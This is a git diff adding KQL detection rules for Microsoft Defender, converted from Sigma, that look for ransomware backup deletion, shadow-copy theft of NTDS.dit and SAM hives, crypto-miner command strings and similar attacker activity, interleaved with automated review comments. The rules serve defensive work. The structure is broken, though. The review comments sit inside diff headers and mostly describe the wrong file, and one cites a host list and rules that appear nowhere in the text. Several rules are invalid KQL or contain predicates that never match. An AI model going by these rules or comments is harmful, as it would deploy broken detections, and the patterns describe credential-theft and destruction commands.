diff --git a/KQL/rules/Impact/new_file_exclusion_added_to_time_machine_via_tmutil_macos.kql b/KQL/rules/Impact/new_file_exclusion_added_to_time_machine_via_tmutil_macos.kql
new file mode 100644
index 00000000..378dc483
--- /dev/null
+++ b/KQL/rules/Impact/new_file_exclusion_added_to_time_machine_via_tmutil_macos.kql
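Review bot: The list entry `"pangolinminer.comgandalph3000.com"` in the `RemoteUrl in~` set looks like two hostnames fused during conversion (pangolinminer.com and gandalph3000.com); as written it can never equal a real RemoteUrl, so both indicators are silently lost. Check the upstream list and, if that is what it holds, split the entry into `"pangolinminer.com", "gandalph3000.com"`. A round-trip check that every generated in~ member is a syntactically valid hostname would catch this class of defect in the converter.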
@@ -0,0 +1,14 @@
+// Title: New File Exclusion Added To Time Machine Via Tmutil - MacOS
+// Author: Pratinav Chandra
+// Date: 2024-05-29
+// Level: medium
+// Description: Detects the addition of a new file or path exclusion to MacOS Time Machine via the "tmutil" utility.
+An adversary could exclude a path from Time Machine backups to prevent certain files from being backed up.
+
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1490
+// False Positives:
+// - Legitimate administrator activity
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "addexclusion" and (FolderPath endswith "/tmutil" or ProcessCommandLine contains "tmutil")
\ No newline at end of file
diff --git a/KQL/rules/Impact/new_root_or_ca_or_authroot_certificate_to_store.kql b/KQL/rules/Impact/new_root_or_ca_or_authroot_certificate_to_store.kql
new file mode 100644
index 00000000..2a0ddd39
--- /dev/null
+++ b/KQL/rules/Impact/new_root_or_ca_or_authroot_certificate_to_store.kql
@@ -0,0 +1,10 @@
+// Title: New Root or CA or AuthRoot Certificate to Store
+// Author: frack113
+// Date: 2022-04-04
+// Level: medium
+// Description: Detects the addition of new root, CA or AuthRoot certificates to the Windows registry
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1490
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "Binary Data" and (RegistryKey endswith "\\SOFTWARE\\Microsoft\\SystemCertificates\\Root\\Certificates*" or RegistryKey endswith "\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Root\\Certificates*" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Root\\Certificates*" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\SystemCertificates\\CA\\Certificates*" or RegistryKey endswith "\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\CA\\Certificates*" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\CA\\Certificates*" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates*" or RegistryKey endswith "\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates*" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\AuthRoot\\Certificates*") and RegistryKey endswith "\\Blob"
\ No newline at end of file
diff --git a/KQL/rules/Impact/portable_gpg_exe_execution.kql b/KQL/rules/Impact/portable_gpg_exe_execution.kql
new file mode 100644
index 00000000..391e214a
--- /dev/null
+++ b/KQL/rules/Impact/portable_gpg_exe_execution.kql
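Review bot: The `| where` line can never match: each `RegistryKey endswith "...\\Certificates*"` keeps the source rule's `*` wildcard as a literal character, and the trailing `and RegistryKey endswith "\\Blob"` requires the same key to end in `\Blob`, which contradicts the first condition. The nine alternatives should become segment matches such as `RegistryKey contains "\\SOFTWARE\\Microsoft\\SystemCertificates\\Root\\Certificates\\"`, with the `\\Blob` suffix check kept as is; the converter's wildcard handling for `endswith` is the underlying issue and presumably affects other rules too. `RegistryValueData =~ "Binary Data"` is the Sysmon rendering of a binary Details field and is unlikely to be what DeviceRegistryEvents reports for a binary value — the RegistryValueType column is probably the right equivalent; verify against the schema before relying on it.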
@@ -0,0 +1,10 @@
+// Title: Portable Gpg.EXE Execution
+// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-06
+// Level: medium
+// Description: Detects the execution of "gpg.exe" from uncommon location. Often used by ransomware and loaders to decrypt/encrypt data.
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1486
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\gpg.exe" or FolderPath endswith "\\gpg2.exe") or ProcessVersionInfoOriginalFileName =~ "gpg.exe" or ProcessVersionInfoFileDescription =~ "GnuPG’s OpenPGP tool") and (not((FolderPath contains ":\\Program Files (x86)\\GNU\\GnuPG\\bin\\" or FolderPath contains ":\\Program Files (x86)\\GnuPG VS-Desktop\\" or FolderPath contains ":\\Program Files (x86)\\GnuPG\\bin\\" or FolderPath contains ":\\Program Files (x86)\\Gpg4win\\bin\\")))
\ No newline at end of file
diff --git a/KQL/rules/Impact/potential_crypto_mining_activity.kql b/KQL/rules/Impact/potential_crypto_mining_activity.kql
new file mode 100644
index 00000000..d6cfa7fc
--- /dev/null
+++ b/KQL/rules/Impact/potential_crypto_mining_activity.kql
@@ -0,0 +1,13 @@
+// Title: Potential Crypto Mining Activity
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-10-26
+// Level: high
+// Description: Detects command line parameters or strings often used by crypto miners
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1496
+// False Positives:
+// - Legitimate use of crypto miners
+// - Some build frameworks
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " --cpu-priority=" or ProcessCommandLine contains "--donate-level=0" or ProcessCommandLine contains " -o pool." or ProcessCommandLine contains " --nicehash" or ProcessCommandLine contains " --algo=rx/0 " or ProcessCommandLine contains "stratum+tcp://" or ProcessCommandLine contains "stratum+udp://" or ProcessCommandLine contains "LS1kb25hdGUtbGV2ZWw9" or ProcessCommandLine contains "0tZG9uYXRlLWxldmVsP" or ProcessCommandLine contains "tLWRvbmF0ZS1sZXZlbD" or ProcessCommandLine contains "c3RyYXR1bSt0Y3A6Ly" or ProcessCommandLine contains "N0cmF0dW0rdGNwOi8v" or ProcessCommandLine contains "zdHJhdHVtK3RjcDovL" or ProcessCommandLine contains "c3RyYXR1bSt1ZHA6Ly" or ProcessCommandLine contains "N0cmF0dW0rdWRwOi8v" or ProcessCommandLine contains "zdHJhdHVtK3VkcDovL") and (not((ProcessCommandLine contains " pool.c " or ProcessCommandLine contains " pool.o " or ProcessCommandLine contains "gcc -")))
\ No newline at end of file
diff --git a/KQL/rules/Impact/potential_file_overwrite_via_sysinternals_sdelete.kql b/KQL/rules/Impact/potential_file_overwrite_via_sysinternals_sdelete.kql
new file mode 100644
index 00000000..14ac4dfa
--- /dev/null
+++ b/KQL/rules/Impact/potential_file_overwrite_via_sysinternals_sdelete.kql
@@ -0,0 +1,10 @@
+// Title: Potential File Overwrite Via Sysinternals SDelete
+// Author: frack113
+// Date: 2021-06-03
+// Level: high
+// Description: Detects the use of SDelete to erase a file not the free space
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1485
+
+DeviceProcessEvents
+| where ProcessVersionInfoOriginalFileName =~ "sdelete.exe" and (not((ProcessCommandLine contains " -h" or ProcessCommandLine contains " -c" or ProcessCommandLine contains " -z" or ProcessCommandLine contains " /?")))
\ No newline at end of file
diff --git a/KQL/rules/Impact/potential_ransomware_activity_using_legalnotice_message.kql b/KQL/rules/Impact/potential_ransomware_activity_using_legalnotice_message.kql
new file mode 100644
index 00000000..1a5b5174
--- /dev/null
+++ b/KQL/rules/Impact/potential_ransomware_activity_using_legalnotice_message.kql
@@ -0,0 +1,10 @@
+// Title: Potential Ransomware Activity Using LegalNotice Message
+// Author: frack113
+// Date: 2022-12-11
+// Level: high
+// Description: Detect changes to the "LegalNoticeCaption" or "LegalNoticeText" registry values where the message set contains keywords often used in ransomware ransom messages
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1491.001
+
+DeviceRegistryEvents
+| where (RegistryValueData contains "encrypted" or RegistryValueData contains "Unlock-Password" or RegistryValueData contains "paying") and (RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\LegalNoticeCaption" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\LegalNoticeText")
\ No newline at end of file
diff --git a/KQL/rules/Impact/potential_secure_deletion_with_sdelete.kql b/KQL/rules/Impact/potential_secure_deletion_with_sdelete.kql
new file mode 100644
index 00000000..aa380599
--- /dev/null
+++ b/KQL/rules/Impact/potential_secure_deletion_with_sdelete.kql
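Review bot: In the LegalNotice rule, `RegistryKey contains "...\\Policies\\System\\LegalNoticeCaption"` cannot match on DeviceRegistryEvents, because unlike Sysmon's TargetObject the RegistryKey column carries only the key path and the value name lives in RegistryValueName. The condition should read `RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System" and RegistryValueName in~ ("LegalNoticeCaption", "LegalNoticeText")`, keeping the RegistryValueData keyword checks as they are. Because this comes from how the backend maps TargetObject, the same dead predicate is likely present in the other registry-value rules produced by this patch.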
@@ -0,0 +1,13 @@
+// Title: Potential Secure Deletion with SDelete
+// Author: Thomas Patzke
+// Date: 2017-06-14
+// Level: medium
+// Description: Detects files that have extensions commonly seen while SDelete is used to wipe files.
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.defense-evasion, attack.t1070.004, attack.t1027.005, attack.t1485, attack.t1553.002, attack.s0195
+// False Positives:
+// - Legitimate usage of SDelete
+// - Files that are interacted with that have these extensions legitimately
+
+DeviceRegistryEvents
+| where RegistryKey endswith ".AAA" or RegistryKey endswith ".ZZZ"
\ No newline at end of file
diff --git a/KQL/rules/Impact/potential_suspicious_change_to_sensitive_critical_files.kql b/KQL/rules/Impact/potential_suspicious_change_to_sensitive_critical_files.kql
new file mode 100644
index 00000000..2adfd108
--- /dev/null
+++ b/KQL/rules/Impact/potential_suspicious_change_to_sensitive_critical_files.kql
@@ -0,0 +1,12 @@
+// Title: Potential Suspicious Change To Sensitive/Critical Files
+// Author: @d4ns4n_ (Wuerth-Phoenix)
+// Date: 2023-05-30
+// Level: medium
+// Description: Detects changes of sensitive and critical files. Monitors files that you don't expect to change without planning on Linux system.
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1565.001
+// False Positives:
+// - Some false positives are to be expected on user or administrator machines. Apply additional filters as needed.
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains ">" and (FolderPath endswith "/cat" or FolderPath endswith "/echo" or FolderPath endswith "/grep" or FolderPath endswith "/head" or FolderPath endswith "/more" or FolderPath endswith "/tail")) or (FolderPath endswith "/emacs" or FolderPath endswith "/nano" or FolderPath endswith "/sed" or FolderPath endswith "/vi" or FolderPath endswith "/vim")) and (ProcessCommandLine contains "/bin/login" or ProcessCommandLine contains "/bin/passwd" or ProcessCommandLine contains "/boot/" or (ProcessCommandLine contains "/etc/" and ProcessCommandLine contains ".conf") or ProcessCommandLine contains "/etc/cron." or ProcessCommandLine contains "/etc/crontab" or ProcessCommandLine contains "/etc/hosts" or ProcessCommandLine contains "/etc/init.d" or ProcessCommandLine contains "/etc/sudoers" or ProcessCommandLine contains "/opt/bin/" or ProcessCommandLine contains "/sbin" or ProcessCommandLine contains "/usr/bin/" or ProcessCommandLine contains "/usr/local/bin/")
\ No newline at end of file
diff --git a/KQL/rules/Impact/registry_disable_system_restore.kql b/KQL/rules/Impact/registry_disable_system_restore.kql
new file mode 100644
index 00000000..1dfead8f
--- /dev/null
+++ b/KQL/rules/Impact/registry_disable_system_restore.kql
@@ -0,0 +1,10 @@
+// Title: Registry Disable System Restore
+// Author: frack113
+// Date: 2022-04-04
+// Level: high
+// Description: Detects the modification of the registry to disable a system restore on the computer
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1490
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey contains "\\Policies\\Microsoft\\Windows NT\\SystemRestore" or RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion\\SystemRestore") and (RegistryKey endswith "DisableConfig" or RegistryKey endswith "DisableSR")
\ No newline at end of file
diff --git a/KQL/rules/Impact/renamed_gpg_exe_execution.kql b/KQL/rules/Impact/renamed_gpg_exe_execution.kql
new file mode 100644
index 00000000..eb49ba18
--- /dev/null
+++ b/KQL/rules/Impact/renamed_gpg_exe_execution.kql
@@ -0,0 +1,10 @@
+// Title: Renamed Gpg.EXE Execution
+// Author: Nasreddine Bencherchali (Nextron Systems), frack113
+// Date: 2023-08-09
+// Level: high
+// Description: Detects the execution of a renamed "gpg.exe". Often used by ransomware and loaders to decrypt/encrypt data.
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1486
+
+DeviceProcessEvents
+| where ProcessVersionInfoOriginalFileName =~ "gpg.exe" and (not((FolderPath endswith "\\gpg.exe" or FolderPath endswith "\\gpg2.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Impact/renamed_sysinternals_sdelete_execution.kql b/KQL/rules/Impact/renamed_sysinternals_sdelete_execution.kql
new file mode 100644
index 00000000..8ca5bce7
--- /dev/null
+++ b/KQL/rules/Impact/renamed_sysinternals_sdelete_execution.kql
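Review bot: In the System Restore rule, `RegistryKey endswith "DisableConfig"` and `endswith "DisableSR"` test a value name against the key path; DeviceRegistryEvents puts the value name in RegistryValueName, so this clause never matches and a rule rated high is effectively dead. Replace it with `RegistryValueName in~ ("DisableConfig", "DisableSR")` and keep the two key-path `contains` checks. `RegistryValueData =~ "DWORD (0x00000001)"` is likewise Sysmon's Details formatting; as far as I know MDE reports a DWORD as its plain decimal string, so the equivalent is `RegistryValueData == "1"` (optionally with `RegistryValueType =~ "Dword"`) — verify against a sample event.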
@@ -0,0 +1,12 @@
+// Title: Renamed Sysinternals Sdelete Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-09-06
+// Level: high
+// Description: Detects the use of a renamed SysInternals Sdelete, which is something an administrator shouldn't do (the renaming)
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1485
+// False Positives:
+// - System administrator usage
+
+DeviceProcessEvents
+| where ProcessVersionInfoOriginalFileName =~ "sdelete.exe" and (not((FolderPath endswith "\\sdelete.exe" or FolderPath endswith "\\sdelete64.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Impact/sensitive_file_access_via_volume_shadow_copy_backup.kql b/KQL/rules/Impact/sensitive_file_access_via_volume_shadow_copy_backup.kql
new file mode 100644
index 00000000..0aaa8b64
--- /dev/null
+++ b/KQL/rules/Impact/sensitive_file_access_via_volume_shadow_copy_backup.kql
@@ -0,0 +1,13 @@
+// Title: Sensitive File Access Via Volume Shadow Copy Backup
+// Author: Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)
+// Date: 2021-08-09
+// Level: high
+// Description: Detects a command that accesses the VolumeShadowCopy in order to extract sensitive files such as the Security or SAM registry hives or the AD database (ntds.dit)
+
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1490
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy" and (ProcessCommandLine contains "\\NTDS.dit" or ProcessCommandLine contains "\\SYSTEM" or ProcessCommandLine contains "\\SECURITY")
\ No newline at end of file
diff --git a/KQL/rules/Impact/stop_windows_service_via_net_exe.kql b/KQL/rules/Impact/stop_windows_service_via_net_exe.kql
new file mode 100644
index 00000000..a7dabeb3
--- /dev/null
+++ b/KQL/rules/Impact/stop_windows_service_via_net_exe.kql
@@ -0,0 +1,12 @@
+// Title: Stop Windows Service Via Net.EXE
+// Author: Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-03-05
+// Level: low
+// Description: Detects the stopping of a Windows service via the "net" utility.
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1489
+// False Positives:
+// - There are many legitimate reasons to stop a service. This rule isn't looking for any suspicious behaviour in particular. Filter legitimate activity accordingly
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " stop " and ((ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")) or (FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Impact/stop_windows_service_via_powershell_stop_service.kql b/KQL/rules/Impact/stop_windows_service_via_powershell_stop_service.kql
new file mode 100644
index 00000000..452acd52
--- /dev/null
+++ b/KQL/rules/Impact/stop_windows_service_via_powershell_stop_service.kql
@@ -0,0 +1,12 @@
+// Title: Stop Windows Service Via PowerShell Stop-Service
+// Author: Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-03-05
+// Level: low
+// Description: Detects the stopping of a Windows service via the PowerShell Cmdlet "Stop-Service"
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1489
+// False Positives:
+// - There are many legitimate reasons to stop a service. This rule isn't looking for any suspicious behaviour in particular. Filter legitimate activity accordingly
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "Stop-Service " and ((ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")) or (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Impact/stop_windows_service_via_sc_exe.kql b/KQL/rules/Impact/stop_windows_service_via_sc_exe.kql
new file mode 100644
index 00000000..14fd63aa
--- /dev/null
+++ b/KQL/rules/Impact/stop_windows_service_via_sc_exe.kql
@@ -0,0 +1,12 @@
+// Title: Stop Windows Service Via Sc.EXE
+// Author: Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-03-05
+// Level: low
+// Description: Detects the stopping of a Windows service via the "sc.exe" utility
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1489
+// False Positives:
+// - There are many legitimate reasons to stop a service. This rule isn't looking for any suspicious behavior in particular. Filter legitimate activity accordingly
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " stop " and (ProcessVersionInfoOriginalFileName =~ "sc.exe" or FolderPath endswith "\\sc.exe")
\ No newline at end of file
diff --git a/KQL/rules/Impact/suspicious_creation_txt_file_in_user_desktop.kql b/KQL/rules/Impact/suspicious_creation_txt_file_in_user_desktop.kql
new file mode 100644
index 00000000..86e85510
--- /dev/null
+++ b/KQL/rules/Impact/suspicious_creation_txt_file_in_user_desktop.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Creation TXT File in User Desktop
+// Author: frack113
+// Date: 2021-12-26
+// Level: high
+// Description: Ransomware create txt file in the user Desktop
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1486
+
+DeviceFileEvents
+| where InitiatingProcessFolderPath endswith "\\cmd.exe" and (FolderPath contains "\\Users\\" and FolderPath contains "\\Desktop\\") and FolderPath endswith ".txt"
\ No newline at end of file
diff --git a/KQL/rules/Impact/suspicious_execution_of_shutdown.kql b/KQL/rules/Impact/suspicious_execution_of_shutdown.kql
new file mode 100644
index 00000000..667bed26
--- /dev/null
+++ b/KQL/rules/Impact/suspicious_execution_of_shutdown.kql
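Review bot: The TXT-on-Desktop rule queries DeviceFileEvents with no ActionType filter, so it fires on FileModified, FileRenamed and FileDeleted events as well as creations, although the Sigma source is a file-creation rule and the title says "Creation". Adding `| where ActionType == "FileCreated"` ahead of the path checks restores the intended scope; the same filter is missing from every other DeviceFileEvents conversion in this patch (ISO-in-temp, the Recent-files mount indicator, Octopus Scanner and the three Office macro rules), so it should be emitted by the backend rather than patched per rule. As written, a high-severity rule that also matches every edit of an existing Desktop .txt file by a cmd.exe child will be noisy.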
@@ -0,0 +1,10 @@
+// Title: Suspicious Execution of Shutdown
+// Author: frack113
+// Date: 2022-01-01
+// Level: medium
+// Description: Use of the commandline to shutdown or reboot windows
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1529
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/r " or ProcessCommandLine contains "/s ") and FolderPath endswith "\\shutdown.exe"
\ No newline at end of file
diff --git a/KQL/rules/Impact/suspicious_execution_of_shutdown_to_log_out.kql b/KQL/rules/Impact/suspicious_execution_of_shutdown_to_log_out.kql
new file mode 100644
index 00000000..86c8dbc8
--- /dev/null
+++ b/KQL/rules/Impact/suspicious_execution_of_shutdown_to_log_out.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Execution of Shutdown to Log Out
+// Author: frack113
+// Date: 2022-10-01
+// Level: medium
+// Description: Detects the rare use of the command line tool shutdown to logoff a user
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1529
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "/l" and FolderPath endswith "\\shutdown.exe"
\ No newline at end of file
diff --git a/KQL/rules/Impact/suspicious_macos_firmware_activity.kql b/KQL/rules/Impact/suspicious_macos_firmware_activity.kql
new file mode 100644
index 00000000..df36ed47
--- /dev/null
+++ b/KQL/rules/Impact/suspicious_macos_firmware_activity.kql
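Review bot: In the shutdown/reboot rule the switch patterns `contains "/r "` and `contains "/s "` carry a trailing space, so a command line whose switch is the last token (for example `shutdown /t 0 /r`) is missed, and the hyphen form `shutdown -r` that shutdown.exe also accepts is not covered at all. A boundary-aware regex handles both: `| where ProcessCommandLine matches regex @"(?i)[/-][rs](\s|$)" and FolderPath endswith "\\shutdown.exe"`. Check the hit rate on patch-orchestration and reboot-scheduling hosts before promoting the level, since this will legitimately fire there.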
@@ -0,0 +1,12 @@
+// Title: Suspicious MacOS Firmware Activity
+// Author: Austin Songer @austinsonger
+// Date: 2021-09-30
+// Level: medium
+// Description: Detects when a user manipulates with Firmward Password on MacOS. NOTE - this command has been disabled on silicon-based apple computers.
+// MITRE Tactic: Impact
+// Tags: attack.impact
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "setpasswd" or ProcessCommandLine contains "full" or ProcessCommandLine contains "delete" or ProcessCommandLine contains "check") and FolderPath =~ "/usr/sbin/firmwarepasswd"
\ No newline at end of file
diff --git a/KQL/rules/Impact/suspicious_reg_add_bitlocker.kql b/KQL/rules/Impact/suspicious_reg_add_bitlocker.kql
new file mode 100644
index 00000000..655c225c
--- /dev/null
+++ b/KQL/rules/Impact/suspicious_reg_add_bitlocker.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Reg Add BitLocker
+// Author: frack113
+// Date: 2021-11-15
+// Level: high
+// Description: Detects suspicious addition to BitLocker related registry keys via the reg.exe utility
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1486
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "EnableBDEWithNoTPM" or ProcessCommandLine contains "UseAdvancedStartup" or ProcessCommandLine contains "UseTPM" or ProcessCommandLine contains "UseTPMKey" or ProcessCommandLine contains "UseTPMKeyPIN" or ProcessCommandLine contains "RecoveryKeyMessageSource" or ProcessCommandLine contains "UseTPMPIN" or ProcessCommandLine contains "RecoveryKeyMessage") and (ProcessCommandLine contains "REG" and ProcessCommandLine contains "ADD" and ProcessCommandLine contains "\\SOFTWARE\\Policies\\Microsoft\\FVE" and ProcessCommandLine contains "/v" and ProcessCommandLine contains "/f")
\ No newline at end of file
diff --git a/KQL/rules/Impact/system_shutdown_reboot_macos.kql b/KQL/rules/Impact/system_shutdown_reboot_macos.kql
new file mode 100644
index 00000000..fdd299b4
--- /dev/null
+++ b/KQL/rules/Impact/system_shutdown_reboot_macos.kql
@@ -0,0 +1,12 @@
+// Title: System Shutdown/Reboot - MacOs
+// Author: Igor Fits, Mikhail Larin, oscd.community
+// Date: 2020-10-19
+// Level: informational
+// Description: Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems.
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1529
+// False Positives:
+// - Legitimate administrative activity
+
+DeviceProcessEvents
+| where FolderPath endswith "/shutdown" or FolderPath endswith "/reboot" or FolderPath endswith "/halt"
\ No newline at end of file
diff --git a/KQL/rules/Impact/time_machine_backup_deletion_attempt_via_tmutil_macos.kql b/KQL/rules/Impact/time_machine_backup_deletion_attempt_via_tmutil_macos.kql
new file mode 100644
index 00000000..e07291bf
--- /dev/null
+++ b/KQL/rules/Impact/time_machine_backup_deletion_attempt_via_tmutil_macos.kql
@@ -0,0 +1,14 @@
+// Title: Time Machine Backup Deletion Attempt Via Tmutil - MacOS
+// Author: Pratinav Chandra
+// Date: 2024-05-29
+// Level: medium
+// Description: Detects deletion attempts of MacOS Time Machine backups via the native backup utility "tmutil".
+An adversary may perform this action before launching a ransonware attack to prevent the victim from restoring their files.
+
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1490
+// False Positives:
+// - Legitimate activities
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "delete" and (FolderPath endswith "/tmutil" or ProcessCommandLine contains "tmutil")
\ No newline at end of file
diff --git a/KQL/rules/Impact/time_machine_backup_disabled_via_tmutil_macos.kql b/KQL/rules/Impact/time_machine_backup_disabled_via_tmutil_macos.kql
new file mode 100644
index 00000000..621414cc
--- /dev/null
+++ b/KQL/rules/Impact/time_machine_backup_disabled_via_tmutil_macos.kql
@@ -0,0 +1,14 @@
+// Title: Time Machine Backup Disabled Via Tmutil - MacOS
+// Author: Pratinav Chandra
+// Date: 2024-05-29
+// Level: medium
+// Description: Detects disabling of Time Machine (Apple's automated backup utility software) via the native macOS backup utility "tmutil".
+An attacker can use this to prevent backups from occurring.
+
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1490
+// False Positives:
+// - Legitimate administrator activity
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "disable" and (FolderPath endswith "/tmutil" or ProcessCommandLine contains "tmutil")
\ No newline at end of file
diff --git a/KQL/rules/Impact/user_has_been_deleted_via_userdel.kql b/KQL/rules/Impact/user_has_been_deleted_via_userdel.kql
new file mode 100644
index 00000000..42e6194f
--- /dev/null
+++ b/KQL/rules/Impact/user_has_been_deleted_via_userdel.kql
@@ -0,0 +1,12 @@
+// Title: User Has Been Deleted Via Userdel
+// Author: Tuan Le (NCSGroup)
+// Date: 2022-12-26
+// Level: medium
+// Description: Detects execution of the "userdel" binary. Which is used to delete a user account and related files. This is sometimes abused by threat actors in order to cover their tracks
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1531
+// False Positives:
+// - Legitimate administrator activities
+
+DeviceProcessEvents
+| where FolderPath endswith "/userdel"
\ No newline at end of file
diff --git a/KQL/rules/Impact/windows_backup_deleted_via_wbadmin_exe.kql b/KQL/rules/Impact/windows_backup_deleted_via_wbadmin_exe.kql
new file mode 100644
index 00000000..50aba8b5
--- /dev/null
+++ b/KQL/rules/Impact/windows_backup_deleted_via_wbadmin_exe.kql
@@ -0,0 +1,15 @@
+// Title: Windows Backup Deleted Via Wbadmin.EXE
+// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2021-12-13
+// Level: medium
+// Description: Detects the deletion of backups or system state backups via "wbadmin.exe".
+This technique is used by numerous ransomware families and actors.
+This may only be successful on server platforms that have Windows Backup enabled.
+
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1490
+// False Positives:
+// - Legitimate backup activity from administration scripts and software.
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "delete " and ProcessCommandLine contains "backup") and (FolderPath endswith "\\wbadmin.exe" or ProcessVersionInfoOriginalFileName =~ "WBADMIN.EXE")) and (not(ProcessCommandLine contains "keepVersions:0"))
\ No newline at end of file
diff --git a/KQL/rules/Impact/windows_recovery_environment_disabled_via_reagentc.kql b/KQL/rules/Impact/windows_recovery_environment_disabled_via_reagentc.kql
new file mode 100644
index 00000000..8c12f212
--- /dev/null
+++ b/KQL/rules/Impact/windows_recovery_environment_disabled_via_reagentc.kql
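Review bot: The trailing `not(ProcessCommandLine contains "keepVersions:0")` excludes exactly the `wbadmin delete backup -keepVersions:0` invocation that removes every backup version, which is the form ransomware operators actually run. I believe upstream Sigma carves that case out into a separate, higher-severity rule, but no such rule is visible in this patch; if it is not generated elsewhere the exclusion leaves the most important variant uncovered and should be dropped, leaving `| where ProcessCommandLine contains "delete " and ProcessCommandLine contains "backup" and (FolderPath endswith "\\wbadmin.exe" or ProcessVersionInfoOriginalFileName =~ "WBADMIN.EXE")`. The two un-commented description continuation lines above the query also make this file invalid KQL until they are prefixed with `//`.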
@@ -0,0 +1,15 @@
+// Title: Windows Recovery Environment Disabled Via Reagentc
+// Author: Daniel Koifman (KoifSec), Michael Vilshin
+// Date: 2025-07-31
+// Level: medium
+// Description: Detects attempts to disable windows recovery environment using Reagentc.
+ReAgentc.exe is a command-line tool in Windows used to manage the Windows Recovery Environment (WinRE).
+It allows users to enable, disable, and configure WinRE, which is used for troubleshooting and repairing common boot issues.
+
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1490
+// False Positives:
+// - Legitimate administrative activity
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-disable" or ProcessCommandLine contains "/disable" or ProcessCommandLine contains "–disable" or ProcessCommandLine contains "—disable" or ProcessCommandLine contains "―disable") and (FolderPath endswith "\\reagentc.exe" or ProcessVersionInfoOriginalFileName =~ "reagentc.exe")
\ No newline at end of file
diff --git a/KQL/rules/Initial Access/disk_image_mounting_via_hdiutil_macos.kql b/KQL/rules/Initial Access/disk_image_mounting_via_hdiutil_macos.kql
new file mode 100644
index 00000000..9ede513f
--- /dev/null
+++ b/KQL/rules/Initial Access/disk_image_mounting_via_hdiutil_macos.kql
@@ -0,0 +1,12 @@
+// Title: Disk Image Mounting Via Hdiutil - MacOS
+// Author: Omar Khaled (@beacon_exe)
+// Date: 2024-08-10
+// Level: medium
+// Description: Detects the execution of the hdiutil utility in order to mount disk images.
+// MITRE Tactic: Initial Access
